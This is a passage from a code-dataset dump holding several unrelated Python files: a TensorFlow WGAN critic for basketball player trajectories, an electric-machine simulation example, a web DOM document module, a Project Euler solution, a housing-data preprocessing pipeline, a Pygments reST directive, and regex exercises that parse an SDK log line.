tf.reshape(conds[:, :, :2], shape=[\n self.batch_size, self.seq_length, 1, 2])\n teamB_pos = tf.reshape(\n inputs, shape=[self.batch_size, self.seq_length, 5, 2])\n basket_right_x = tf.constant(self.data_factory.BASKET_RIGHT[0], dtype=tf.float32, shape=[\n self.batch_size, self.seq_length, 1, 1])\n basket_right_y = tf.constant(self.data_factory.BASKET_RIGHT[1], dtype=tf.float32, shape=[\n self.batch_size, self.seq_length, 1, 1])\n basket_pos = tf.concat(\n [basket_right_x, basket_right_y], axis=-1)\n # open shot penalty = amin((theta + 1.0) * (dist_ball_2_teamB + 1.0))\n vec_ball_2_teamB = ball_pos - teamB_pos\n vec_ball_2_basket = ball_pos - basket_pos\n b2teamB_dot_b2basket = tf.matmul(\n vec_ball_2_teamB, vec_ball_2_basket, transpose_b=True)\n b2teamB_dot_b2basket = tf.reshape(b2teamB_dot_b2basket, shape=[\n self.batch_size, self.seq_length, 5])\n dist_ball_2_teamB = tf.norm(\n vec_ball_2_teamB, ord='euclidean', axis=-1)\n dist_ball_2_basket = tf.norm(\n vec_ball_2_basket, ord='euclidean', axis=-1)\n\n theta = tf.acos(b2teamB_dot_b2basket /\n (dist_ball_2_teamB * dist_ball_2_basket+1e-3)) # avoid nan\n open_shot_score_all = (theta + 1.0) * (dist_ball_2_teamB + 1.0)\n\n # one_sub_cosine = 1 - b2teamB_dot_b2basket / \\\n # (dist_ball_2_teamB * dist_ball_2_basket)\n # open_shot_score_all = one_sub_cosine + dist_ball_2_teamB\n\n open_shot_score_min = tf.reduce_min(\n open_shot_score_all, axis=-1)\n open_shot_score = tf.reduce_mean(open_shot_score_min)\n if if_log:\n with tf.name_scope(log_scope_name):\n tf.summary.scalar('open_shot_score',\n open_shot_score, collections=['G'])\n return open_shot_score\n\n def __loss_fn(self, real_data, G_sample, fake_scores, real_scores, penalty_lambda):\n \"\"\" Critic loss\n\n Params\n ------\n real_data : tensor, float, shape=[batch_size, seq_length, features=10]\n real data, team B, defensive players\n G_sample : tensor, float, shape=[batch_size, seq_length, features=10]\n fake data, team B, defensive players\n fake_scores : tensor, float, shape=[batch_size]\n result from inference given fake data\n real_scores : tensor, float, shape=[batch_size]\n result from inference given real data\n penalty_lambda : float\n gradient penalty's weight, ref from paper 'improved-wgan'\n\n Return\n ------\n loss : float, shape=[]\n the mean loss of one batch\n \"\"\"\n with tf.name_scope('C_loss') as scope:\n # grad_pen, base on paper (Improved-WGAN)\n epsilon = tf.random_uniform(\n [self.batch_size, 1, 1], minval=0.0, maxval=1.0)\n X_inter = epsilon * real_data + (1.0 - epsilon) * G_sample\n if self.if_use_mismatched:\n cond_inter = epsilon * self.__matched_cond + \\\n (1.0 - epsilon) * self.__mismatched_cond\n else:\n cond_inter = self.__matched_cond\n\n grad = tf.gradients(\n self.inference(X_inter, cond_inter, reuse=True), [X_inter])[0]\n sum_ = tf.reduce_sum(tf.square(grad), axis=[1, 2])\n grad_norm = tf.sqrt(sum_)\n grad_pen = penalty_lambda * tf.reduce_mean(\n tf.square(grad_norm - 1.0))\n EM_dist = tf.identity(real_scores - fake_scores, name=\"EM_dist\")\n f_fake = tf.reduce_mean(fake_scores)\n f_real = tf.reduce_mean(real_scores)\n # Earth Moving Distance\n loss = f_fake - f_real + grad_pen\n\n # logging\n tf.summary.scalar('C_loss', loss,\n collections=['C', 'C_valid'])\n tf.summary.scalar('F_real', f_real, collections=['C'])\n tf.summary.scalar('F_fake', f_fake, collections=['C'])\n tf.summary.scalar('Earth Moving Distance',\n f_real - f_fake, collections=['C', 'C_valid'])\n tf.summary.scalar('grad_pen', grad_pen, collections=['C'])\n\n return loss\n\n def step(self, sess, G_samples, real_data, conditions):\n \"\"\" train one batch on C\n\n Params\n ------\n sess : tensorflow Session\n G_samples : float, shape=[batch_size, seq_length, features=10]\n fake data, team B, defensive players\n real_data : float, shape=[batch_size, seq_length, features=10]\n real data, team B, defensive players\n conditions : float, shape=[batch_size, seq_length, features=13]\n real data, team A, offensive players\n\n Returns\n -------\n loss : float\n batch mean loss\n global_steps : int\n global steps\n \"\"\"\n feed_dict = {self.__G_samples: G_samples,\n self.__matched_cond: conditions,\n self.__real_data: real_data}\n steps, summary, loss, global_steps, _ = sess.run(\n [self.__steps, self.__summary_op, self.__loss, self.__global_steps, self.__train_op], feed_dict=feed_dict)\n # log\n self.summary_writer.add_summary(\n summary, global_step=global_steps)\n if (steps - 1) % 1000 == 0:\n summary_histogram = sess.run(\n self.__summary_histogram_op, feed_dict=feed_dict)\n self.summary_writer.add_summary(\n summary_histogram, global_step=global_steps)\n\n return loss, global_steps\n\n def log_valid_loss(self, sess, G_samples, real_data, conditions):\n \"\"\" get one batch validation loss\n\n Params\n ------\n sess : tensorflow Session\n G_samples : float, shape=[batch_size, seq_length, features=10]\n fake data, team B, defensive players\n real_data : float, shape=[batch_size, seq_length, features=10]\n real data, team B, defensive players\n conditions : float, shape=[batch_size, seq_length, features=13]\n real data, team A, offensive players\n\n Returns\n -------\n loss : float\n validation batch mean loss\n \"\"\"\n feed_dict = {self.__G_samples: G_samples,\n self.__matched_cond: conditions,\n self.__real_data: real_data}\n summary, loss, global_steps = sess.run(\n [self.__summary_valid_op, self.__loss, self.__global_steps], feed_dict=feed_dict)\n # log\n self.valid_summary_writer.add_summary(\n summary, global_step=global_steps)\n return loss\n\n def eval_EM_distance(self, sess, G_samples, real_data, conditions, global_steps):\n \"\"\" \n \"\"\"\n feed_dict = {self.__G_samples: G_samples,\n self.__matched_cond: conditions,\n self.__real_data: real_data}\n _, summary = sess.run(\n [self.EM_dist, self.summary_em], feed_dict=feed_dict)\n self.baseline_summary_writer.add_summary(\n summary, global_step=global_steps)\n","sub_path":"src/RNN/Critic_Baseline.py","file_name":"Critic_Baseline.py","file_ext":"py","file_size_in_byte":16673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"418847567","text":"import femagtools\nimport femagtools.plot\nimport femagtools.machine\nimport logging\nimport matplotlib.pyplot as plt\nimport os\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(message)s')\n\nmachine = dict(\n name=\"PM 270 L8\",\n lfe=0.08356,\n poles=8,\n outer_diam=0.26924,\n bore_diam=0.16192,\n inner_diam=0.092,\n airgap=0.00075,\n\n stator=dict(\n num_slots=48,\n nodedist=2.5,\n mcvkey_yoke='M330-50A',\n statorRotor3=dict(\n slot_height=0.0335,\n slot_h1=0.001,\n slot_h2=0.0,\n slot_r1=0.0001,\n slot_r2=0.00282,\n wedge_width1=0.00295,\n wedge_width2=0,\n middle_line=0,\n tooth_width=0.0,\n slot_top_sh=0.0,\n slot_width=0.00193)\n ),\n\n magnet=dict(\n mcvkey_yoke='M330-50A',\n magnetIronV=dict(\n magn_width=18e-3,\n magn_height=6.48e-3,\n magn_angle=145,\n magn_num=1,\n gap_ma_iron=0.2e-3,\n air_triangle=1e-3,\n iron_height=2.61e-3,\n iron_hs=0.1e-3,\n shaft_rad=55.32e-3,\n iron_shape=80.2e-3,\n air_space_h=5.5e-3,\n iron_bfe=3e-3,\n magn_di_ra=6e-3,\n corner_r=0,\n air_sp_ori=1,\n magn_ori=1,\n condshaft_r=55.32e-3)\n ),\n\n windings=dict(\n num_phases=3,\n num_wires=9,\n coil_span=6.0,\n num_layers=1)\n)\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(message)s')\n\nworkdir = os.path.join(\n os.path.expanduser('~'), 'femag')\ntry:\n os.makedirs(workdir)\nexcept OSError:\n pass\n\nfemag = femagtools.Femag(workdir, magnetizingCurves='../magnetcurves')\n\npmRelSim = dict(\n angl_i_up=-39.3,\n calculationMode=\"pm_sym_fast\",\n wind_temp=60.0,\n magn_temp=60.0,\n current=76.43,\n period_frac=6,\n speed=50.0,\n shortCircuit=True,\n l_end_winding=0,\n l_external=0,\n sc_type=3,\n initial=2,\n allow_demagn=0,\n sim_demagn=1)\n\nr = femag(machine,\n pmRelSim)\n\nprint('Torque [Nm] = {}'.format(r.machine['torque']))\nprint('''\nShort Circuit Current Torque\n Peak iks {2:8.1f} A tks {3:8.1f} Nm\n Stationary ikd {0:8.1f} A tkd {1:8.1f} Nm\n\n peak winding currents {4}\n'''.format(r.scData['ikd'],\n r.scData['tkd'],\n r.scData['iks'],\n r.scData['tks'],\n r.scData['peakWindingCurrents']))\nprint('Demag {}'.format(r.demag[-1]))\n\nfig, ax = plt.subplots()\nfemagtools.plot.transientsc(r)\nplt.show()\n","sub_path":"examples/calculation/pm_sym_fast_shortcircuit.py","file_name":"pm_sym_fast_shortcircuit.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"469206049","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport tempfile\nimport shutil\nfrom functools import partial\nfrom types import ModuleType\nfrom typing import Optional, Union, Callable\nimport weakref\n\nfrom wdom.options import config\nfrom wdom.interface import Event\nfrom wdom.node import Node, DocumentType, Text, RawHtml, Comment\nfrom wdom.node import DocumentFragment\nfrom wdom.element import Element, Attr, _create_element\nfrom wdom.web_node import WebElement\nfrom wdom.tag import HTMLElement\nfrom wdom.tag import Html, Head, Body, Meta, Link, Title, Script\nfrom wdom.window import Window\n\n\ndef getElementById(id: Union[str, int]) -> Optional[Node]:\n elm = Element._elements_with_id.get(str(id))\n if elm and elm.ownerDocument:\n return elm\n else:\n return None\n\n\ndef getElementByRimoId(id: Union[str, int]) -> Optional[WebElement]:\n elm = WebElement._elements_with_rimo_id.get(str(id))\n if elm and elm.ownerDocument:\n return elm\n else:\n return None\n\n\ndef _cleanup(path):\n if os.path.isdir(path):\n shutil.rmtree(path)\n\n\nclass Document(Node):\n nodeType = Node.DOCUMENT_NODE\n nodeName = '#document'\n\n @property\n def defaultView(self) -> Window:\n return self._window\n\n @property\n def tempdir(self) -> str:\n return self._tempdir\n\n def __init__(self, doctype='html', title='W-DOM', charset='utf-8',\n default_class=HTMLElement, autoreload=None, reload_wait=None):\n self._tempdir = _tempdir = tempfile.mkdtemp()\n self._finalizer = weakref.finalize(self, partial(_cleanup, _tempdir))\n super().__init__()\n self._window = Window(self)\n self._default_class = default_class\n self._autoreload = autoreload\n self._reload_wait = reload_wait\n\n self.doctype = DocumentType(doctype, parent=self)\n self.html = Html(parent=self)\n self.head = Head(parent=self.html)\n self.charset_element = Meta(parent=self.head)\n self.characterSet = charset\n self.title_element = Title(parent=self.head)\n self.title = title\n\n self.body = Body(parent=self.html)\n self.script = Script(parent=self.body)\n self._autoreload_script = Script(parent=self.head)\n\n def _set_autoreload(self):\n self._autoreload_script.textContent = ''\n if self._autoreload is None:\n autoreload = (config.autoreload or config.debug)\n else:\n autoreload = self._autoreload\n\n if autoreload:\n ar_script = []\n ar_script.append('var RIMO_AUTORELOAD = true')\n if self._reload_wait is not None:\n ar_script.append('var RIMO_RELOAD_WAIT = {}'.format(\n self._reload_wait))\n self._autoreload_script.textContent = '\\n{}\\n'.format(\n '\\n'.join(ar_script))\n\n def getElementById(self, id: Union[str, int]) -> Optional[Node]:\n elm = getElementById(id)\n if elm and elm.ownerDocument is self:\n return elm\n\n def getElementByRimoId(self, id: Union[str, int]) -> Optional[WebElement]:\n elm = getElementByRimoId(id)\n if elm and elm.ownerDocument is self:\n return elm\n\n def createElement(self, tag: str):\n return _create_element(tag, base=self._default_class)\n\n def createDocumentFragment(self):\n return DocumentFragment()\n\n def createTextNode(self, text: str):\n return Text(text)\n\n def createComment(self, text: str):\n return Comment(text)\n\n def createEvent(self, event: str):\n return Event(event)\n\n def createAttribute(self, name: str):\n return Attr(name)\n\n @property\n def title(self) -> str:\n return self.title_element.textContent\n\n @title.setter\n def title(self, value: str):\n self.title_element.textContent = value\n\n @property\n def characterSet(self) -> str:\n return self.charset_element.getAttribute('charset')\n\n @characterSet.setter\n def characterSet(self, value: str):\n self.charset_element.setAttribute('charset', value)\n\n @property\n def charset(self) -> str:\n return self.characterSet\n\n @charset.setter\n def charset(self, value: str):\n self.characterSet = value\n\n def add_jsfile(self, src: str):\n self.body.appendChild(Script(src=src))\n\n def add_jsfile_head(self, src: str):\n self.head.appendChild(Script(src=src))\n\n def add_cssfile(self, src: str):\n self.head.appendChild(Link(rel='stylesheet', href=src))\n\n def add_header(self, header: str):\n self.head.appendChild(RawHtml(header))\n\n def register_theme(self, theme: ModuleType) -> None:\n if not hasattr(theme, 'css_files'):\n raise ValueError('theme module must include `css_files`.')\n for css in getattr(theme, 'css_files', []):\n self.add_cssfile(css)\n for js in getattr(theme, 'js_files', []):\n self.add_jsfile(js)\n for header in getattr(theme, 'headers', []):\n self.add_header(header)\n for cls in getattr(theme, 'extended_classes', []):\n self.defaultView.customElements.define(cls)\n\n def build(self) -> str:\n self._set_autoreload()\n return ''.join(child.html for child in self.childNodes)\n\n\ndef get_new_document(include_rimo: bool = True,\n include_skeleton: bool = False,\n include_normalizecss: bool = False,\n autoreload: Optional[bool] = None,\n reload_wait: int = None,\n log_level: int = None,\n log_prefix: str = None,\n log_console: bool = False,\n ws_url: str = None,\n document_factory: Callable[..., Document] = Document,\n **kwargs) -> Document:\n document = document_factory(\n autoreload=autoreload,\n reload_wait=reload_wait,\n **kwargs)\n if log_level is None:\n log_level = config.logging\n\n log_script = []\n if log_level is not None:\n if isinstance(log_level, str):\n log_script.append('var RIMO_LOG_LEVEL = \\'{}\\''.format(log_level))\n elif isinstance(log_level, int):\n log_script.append('var RIMO_LOG_LEVEL = {}'.format(log_level))\n if log_prefix is not None:\n log_script.append('var RIMO_LOG_PREFIX = \\'{}\\''.format(log_prefix))\n if log_console:\n log_script.append('var RIMO_LOG_CONSOLE = true')\n if log_script:\n _s = Script(parent=document.head)\n _s.textContent = '\\n{}\\n'.format('\\n'.join(log_script))\n\n if ws_url is not None:\n _s = Script(parent=document.head)\n _s.textContent = '\\nvar RIMO_WS_URL = \\'{}\\'\\n'.format(ws_url)\n\n if include_rimo:\n document.add_jsfile_head('_static/js/rimo/rimo.js')\n\n return document\n\n\n# get_document = get_new_document\ndef get_document(*args, **kwargs):\n return rootDocument\n\n\ndef set_document(new_document: Document, *args, **kwargs):\n global rootDocument\n rootDocument = new_document\n\n\nrootDocument = get_new_document()\n","sub_path":"wdom/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":7107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"244169788","text":"import math\n\nPrimes = list();\nNumbers = [True]*1000000;\n\ndef genList():\n for i in range(2, 1000000):\n if(Numbers[i] == True):\n Primes.append(i);\n else:\n continue;\n \n for j in range(2*i, 1000000, i):\n Numbers[j] = False; #mark multiples of i as non prime\n\ndef Fcount(n):\n count = 0;\n \n for j in range(2, int(math.sqrt(n) + 1)):\n if(count >= 5):\n return count;\n if(n % j == 0):\n if(j in Primes):\n count += 1;\n if((n/j) in Primes):\n count += 1;\n return count;\n \n\ngenList(); \n\ni = 1000;\n\nwhile(1):\n if(Fcount(i) == 4):\n if(Fcount(i + 1) == 4):\n if(Fcount(i + 2) == 4):\n print(i, i + 1, i + 2, \"3 in a row\");\n if(Fcount(i + 3) == 4):\n print(i, \"4 in a row\");\n break;\n i += 1;\n\n \nprint(\"Done running\");\n\n\nPrimes = list()\n","sub_path":"047/Problem 47_Python.py","file_name":"Problem 47_Python.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"16923648","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\nimport hashlib\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import StratifiedShuffleSplit\n\nfrom sklearn.impute import SimpleImputer\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.preprocessing import StandardScaler\n\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.pipeline import FeatureUnion\n\nfrom pandas.plotting import scatter_matrix\n\nPATH = \"E:\\\\Data\\\\Hands-on-Machine-Learning\"\nNAME_FILE = \"housing.csv\"\n\ndef importation_donnees(chemin,nom_fichier):\n file_name = os.path.join(chemin,nom_fichier)\n data = pd.read_csv(file_name)\n return data\n\ndef categorie_income():\n housing[\"income_cat\"] = np.ceil(housing['median_income']/1.5)\n housing[\"income_cat\"].where(housing['income_cat']<5,5.0,inplace=True)\n\ndef split_stratifie():\n categorie_income()\n split= StratifiedShuffleSplit(n_splits=1,\n test_size=0.2,\n random_state=42)\n\n for train_index,test_index in split.split(housing,housing[\"income_cat\"]):\n strat_train = housing.loc[train_index]\n strat_test = housing.loc[test_index]\n \n #print(strat_train[\"income_cat\"].value_counts())\n #print(strat_train[\"income_cat\"].value_counts()/len(strat_train[\"income_cat\"]))\n\n return strat_train,strat_test\n\ndef first_step(): \n strat_train_set,strat_test_set = split_stratifie()\n \n for _set in (strat_train_set,strat_test_set):\n _set.drop(\"income_cat\",axis=1,inplace=True)\n\n return strat_train_set,strat_test_set\n\ndef export():\n housing = train.drop(\"median_house_value\",axis=1)\n labels= train[\"median_house_value\"]\n sauvegarde = os.path.join(PATH,'housing_labels.csv')\n\n labels.to_csv(sauvegarde, \n header=False, \n index=False, \n sep=',')\n\n housing_test = test.drop(\"median_house_value\",axis=1)\n\n labels_test = test[\"median_house_value\"]\n sauvegarde_test = os.path.join(PATH,'housing_labels_test.csv')\n\n labels_test.to_csv(sauvegarde_test, \n header=False, \n index=False, \n sep=',')\n\ndef encodage():\n housing = train.drop(\"median_house_value\",axis=1)\n labels= train[\"median_house_value\"]\n\n housing_num = housing.drop(\"ocean_proximity\",axis=1)\n\n imputer = SimpleImputer(strategy=\"median\")\n imputer.fit(housing_num)\n\n X = imputer.transform(housing_num)\n housing_tr = pd.DataFrame(X,columns=housing_num.columns)\n\n encoder = LabelEncoder()\n housing_cat = housing[\"ocean_proximity\"]\n housing_cat_encoded = encoder.fit_transform(housing_cat)\n\n encoder = OneHotEncoder()\n housing_cat_1hot = encoder.fit_transform(housing_cat_encoded.reshape(-1,1))\n\n encoder = LabelBinarizer()\n housing_cat_1hot = encoder.fit_transform(housing_cat)\n\n total_X = pd.concat([housing_tr,pd.DataFrame(housing_cat_1hot)])\n return total_X\n\nclass CombinedAttributesAdder(BaseEstimator, TransformerMixin):\n def __init__(self, add_bedrooms_per_room = True): # no *args or **kargs\n self.add_bedrooms_per_room = add_bedrooms_per_room\n \n def fit(self, X, y=None):\n return self # nothing else to do\n \n def transform(self, X, y=None):\n rooms_per_household = X[:, rooms_ix] / X[:, household_ix]\n population_per_household = X[:, population_ix] / X[:, household_ix]\n if self.add_bedrooms_per_room:\n bedrooms_per_room = X[:, bedrooms_ix] / X[:, rooms_ix]\n return np.c_[X, rooms_per_household, population_per_household,\n bedrooms_per_room]\n else:\n return np.c_[X, rooms_per_household, population_per_household]\n\nclass DataFrameSelector(BaseEstimator, TransformerMixin):\n def __init__(self, attribute_names):\n self.attribute_names = attribute_names\n def fit(self, X, y=None):\n return self\n def transform(self, X):\n return X[self.attribute_names].values\n\n###############################################################################\n########### DATASET ###########################################################\n###############################################################################\n\nrooms_ix, bedrooms_ix, population_ix, household_ix = 3, 4, 5, 6\nhousing = importation_donnees(PATH,NAME_FILE)\n\ntrain, test = first_step()\nexport()\n\nhousing = train.drop(\"median_house_value\",axis=1)\nlabels= train[\"median_house_value\"]\nhousing_num = housing.drop(\"ocean_proximity\",axis=1)\n\nhousing_test = test.drop(\"median_house_value\",axis=1)\nlabels= test[\"median_house_value\"]\nhousing_num_test = housing_test.drop(\"ocean_proximity\",axis=1)\n\n\n###############################################################################\n########### PIPELINE ##########################################################\n###############################################################################\n\nnum_attribs = list(housing_num.columns)\ncat_attribs = [\"ocean_proximity\"]\n\nnum_pipeline = Pipeline([\n ('selector', DataFrameSelector(num_attribs)),\n ('imputer', SimpleImputer(strategy=\"median\")),\n ('attribs_adder', CombinedAttributesAdder()),\n ('std_scaler', StandardScaler()),\n ])\n\ncat_pipeline = Pipeline([\n ('label_binarizer', LabelBinarizer()),\n ])\n\nfull_pipeline = FeatureUnion(transformer_list=[\n (\"num_pipeline\", num_pipeline),\n (\"cat_pipeline\", cat_pipeline),\n ])\n\n###############################################################################\n########### TRAIN #############################################################\n###############################################################################\n\nnumie = num_pipeline.fit_transform(housing)\n\nencoder = LabelBinarizer()\nhousing_cat = encoder.fit_transform(housing[\"ocean_proximity\"])\n\nprint(numie.shape)\nprint(housing_cat.shape)\n\nhousing_prepared = pd.concat([pd.DataFrame(numie),pd.DataFrame(housing_cat)],axis=1)\n\nprint(type(housing_prepared))\nprint(housing_prepared.shape)\n\nsauvegarde = os.path.join(PATH,'housing_prepared.csv')\n\nhousing_prepared.to_csv(sauvegarde, \n header=False, \n index=False, \n sep=',')\n\n###############################################################################\n########### TEST #############################################################\n###############################################################################\n\nnumie_test = num_pipeline.fit_transform(housing_test)\n\nencoder = LabelBinarizer()\nhousing_cat_test = encoder.fit_transform(housing_test[\"ocean_proximity\"])\n\nprint(numie_test.shape)\nprint(housing_cat_test.shape)\n\nhousing_prepared_test = pd.concat([pd.DataFrame(numie_test),pd.DataFrame(housing_cat_test)],axis=1)\n\nprint(type(housing_prepared_test))\nprint(housing_prepared_test.shape)\n\nsauvegarde_test = os.path.join(PATH,'housing_prepared_test.csv')\n\nhousing_prepared_test.to_csv(sauvegarde_test, \n header=False, \n index=False, \n sep=',')\n\n\n\n","sub_path":"Python - Hands On Machine Learning/05 - Hands On - Data Preparation.py","file_name":"05 - Hands On - Data Preparation.py","file_ext":"py","file_size_in_byte":7320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"520152940","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.darwin-8.9.0-Power_Macintosh/egg/pudge/pygmentsupport.py\n# Compiled at: 2007-01-07 21:35:14\nimport docutils.parsers.rst\nfrom pygments import highlight\nfrom pygments.lexers import get_lexer_by_name, get_all_lexers\nfrom pygments.formatters import HtmlFormatter\n\ndef code_block(name, arguments, options, content, lineno, content_offset, block_text, state, state_machine):\n \"\"\"\n The code-block directive provides syntax highlighting for blocks\n of code. It is used with the the following syntax::\n\n .. code-block:: Python\n \n class Test(object):\n pass\n \n The code will be highlighted with the pygments syntax highlighter. It's\n recommended that you include the appropriate stylesheets when using this\n highlighter.\n \"\"\"\n try:\n language = arguments[0]\n except IndexError:\n language = options['language']\n\n language = language.lower()\n if language == 'hypertext':\n language = 'html'\n if language == 'pasteini':\n language = 'ini'\n lexer = get_lexer_by_name(language, stripall=True)\n formatter = HtmlFormatter(linenos=True, cssclass='syntax', encoding='utf-8')\n html = highlight(unicode(('\\n').join(content)), lexer, formatter).decode('utf-8')\n raw = docutils.nodes.raw('', html, format='html')\n return [raw]\n\n\ncode_block.arguments = (0, 1, 1)\ncode_block.options = {'language': docutils.parsers.rst.directives.unchanged}\ncode_block.content = 1\ndocutils.parsers.rst.directives.register_directive('code-block', code_block)","sub_path":"pycfiles/pudge-0.1.3-py2.4/pygmentsupport.py","file_name":"pygmentsupport.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"220830456","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport re\n\n# key = r\"

hello world

\"#这段是你要匹配的文本\n# p1 = r\"(?<=

).+?(?=

)\"#这是我们写的正则表达式规则,你现在可以不理解啥意思\n# pattern1 = re.compile(p1)#我们在编译这段正则表达式\n# matcher1 = re.search(pattern1,key)#在源文本中搜索符合正则表达式的部分\n# print(matcher1.group(0))#打印出来\n#\n# print('--------------------------------------------------------------------')\n#\n# key = r'asdfaljpythonasdfasdf asdf ;asdf'\n# p1 = r'python'\n# pattern1 = re.compile(p1)\n# matcher1 = re.search(pattern1,key)\n# print(666,matcher1.group(0))\n#\n# print('--------------------------------------------------------------------')\n#\n# key = r\"

hello world

\"#源文本\n# p1 = r\"

.+

\"#我们写的正则表达式,下面会将为什么\n# pattern1 = re.compile(p1)\n# print(pattern1.findall(key))#发没发现,我怎么写成findall了?咋变了呢?\n#\n# print('--------------------------------------------------------------------')\n#\n# key = r\"afiouwehrfuichuxiuhong@hit.edu.cnaskdjhfiosueh\"\n# p1 = r'chuxiuhong@hit\\.edu\\.cn'\n# pattern1 = re.compile(p1)\n# print(pattern1.findall(key))\n#\n# print('--------------------------------------------------------------------')\n#\n# key = r'http://www.abcdefg.com and https://1234567.com'\n# p1 = r'https*://'\n# pattern1 = re.compile(p1)\n# print(pattern1.findall(key))\n#\n# print('--------------------------------------------------------------------')\n#\n# key = r'asdlfj;helloasdlf;j;lasdfa'\n# p1 = r'<[Hh][Tt][Mm][Ll]>.+?'\n# pattern1 = re.compile(p1)\n# print(pattern1.findall(key))\n#\n# print('--------------------------------------------------------------------')\n#\n# key = r'mat cat hat pat'\n# p1 = r'[^p]at'\n# pattern1 = re.compile(p1)\n# print(pattern1.findall(key))\n#\n# print('--------------------------------------------------------------------')\n#\n# key = r'chuxiuhong@hit.edu.cn'\n# p1 = r'@.+?\\.'\n# pattern1 = re.compile(p1)\n# print(pattern1.findall(key))\n#\n#\n# print('--------------------------------------------------------------------')\n#\n# key = r'saas and sas and saaas'\n# p1 = r'sa{1,2}s'\n# pattern1 = re.compile(p1)\n# print(pattern1.findall(key))\n#\n# print('--------------------------------------------------------------------')\n#\n#\n# key = r'helloworldpython123'\n# p1 = r'python'\n# pattern1 = re.compile(p1)\n# ret = re.search(pattern1,key)\n# print(1,ret.group(0))\n#\n# print('--------------------------------------')\n#\n# key = r'

hello world

'\n# p1 = r'

.+

'\n# pattern1 = re.compile(p1)\n# ret = re.search(pattern1,key)\n# print(2,ret.group(0))\n# print(3,pattern1.findall(key))\n#\n# print('--------------------------------------')\n#\n# key = r'asdfhkljhsadkfhklq6743@163.comasdfhhkasjdhfk'\n# p1 = r'klq.+com'\n# pattern1 = re.compile(p1)\n# ret = pattern1.findall(key)\n# print(ret)\n#\n# print('--------------------------------------')\n#\n# key = r'asdfasd;asdfhttp://www.baidu.com and https://www.google.comasdfa'\n# p1 = r'https*.+?com'\n# pattern1 = re.compile(p1)\n# ret = pattern1.findall(key)\n# print(ret[0],ret[1])\n#\n# print('--------------------------------------')\n#\n# key = r'asdfladskhhelloasdlfhklh'\n# p1 = r'<[Hh][Tt][Mm][Ll]>.+?'\n# pattern1 = re.compile(p1)\n# ret = pattern1.findall(key)\n# print(ret)\n#\n# print('--------------------------------------')\n#\n# key = r'mat cat hat pat'\n# p1 = r'[^pm]at'\n# pattern1 = re.compile(p1)\n# ret = pattern1.findall(key)\n# print(ret)\n#\n# print('--------------------------------------')\n#\n# str = r'www.google.com/ncr.666.777.888.999'\n# p1 = r'/.+?\\.'\n# pattern1 = re.compile(p1)\n# ret = pattern1.findall(str)\n# print(ret)\n#\n# print('--------------------------------------')\n#\n# str = r'chuxiuhong@hit.edu.cn'\n# p1 = r'@.+?\\.'\n# pattern1 = re.compile(p1)\n# ret = pattern1.findall(str)\n# print(ret)\n#\n# print('--------------------------------------')\n#\n# key = r'sassaassaaassaaaassaaasssaasssaassaaaas'\n# p1 = r'sa{1,}s'\n# pattern1 = re.compile(p1)\n# ret = pattern1.findall(key)\n# print(ret)\n#\n# print('--------------------------------------')\n# print('**************************************')\n# print('--------------------------------------')\n#\n# key = r'

hello world

'\n# p1 = r'(?<=

).+?(?=

)'\n# pattern1 = re.compile(p1)\n# matcher1 = pattern1.findall(key)\n# print(matcher1)\n#\n# print('--------------------------------------')\n#\n# key = r'

hello world

'\n# p1 = r'h([1-6])>.*?'\n# m1 = re.search(pattern1,key)\n# print(1,m1.group(0))\n\nprint('----------------test begin------------------\\n')\n\n\nkey = '[SYS][DEBUG][2018-03-04 20:01:47.079][GizWifiSDK.m:1401 +[GizWifiSDK startWithAppInfo:productInfo:cloudServiceInfo:autoSetDeviceDomain:]][start => appInfo: {]appId = \"ac0****89e\";appSecret = \"d2c****e28\";}, productInfo: [{\"productSecret\":\"d62****580\",\"productKey\":\"bc18803e55c5432185e18df96bb11c99\"}], cloudServiceInfo: (null), autoSetDeviceDomain: false'\n\np1 = r'appId.+?;'\npattern1 = re.compile(p1)\nret = pattern1.findall(key)\nprint(ret)\n\np2 = r'appSecret.+?;'\npattern2 = re.compile(p2)\nret = pattern2.findall(key)\nprint(ret)\n\np = r'productInfo.+'\npattern = re.compile(p)\nproductInfo = pattern.findall(key)\nprint(productInfo)\n\np = r'{\".+\"}'\npattern = re.compile(p)\npkPs = pattern.findall(key)\nprint(666,pkPs)\n\n\n# key = r\"[SYS][ERROR][2018-04-08 16:25:03.954][httpCommon.c:920 httpsSSLConnectByDomainPort][sslConnectByIPPort 119.29.47.111:443 failed, errorCode 8046]\"\nkey = r\"2018-04-08 16:25:03.954[httpCommon.c:920 httpsSSLConnectByDomainPort]sslConnectByIPPort 119.29.47.111:443 failed, errorCode 8046\"\n\np = r'\\[.+\\]'\npattern = re.compile(p)\nlistt = pattern.findall(key)\nprint(777,listt)\n\n\nprint('\\n-----------------test 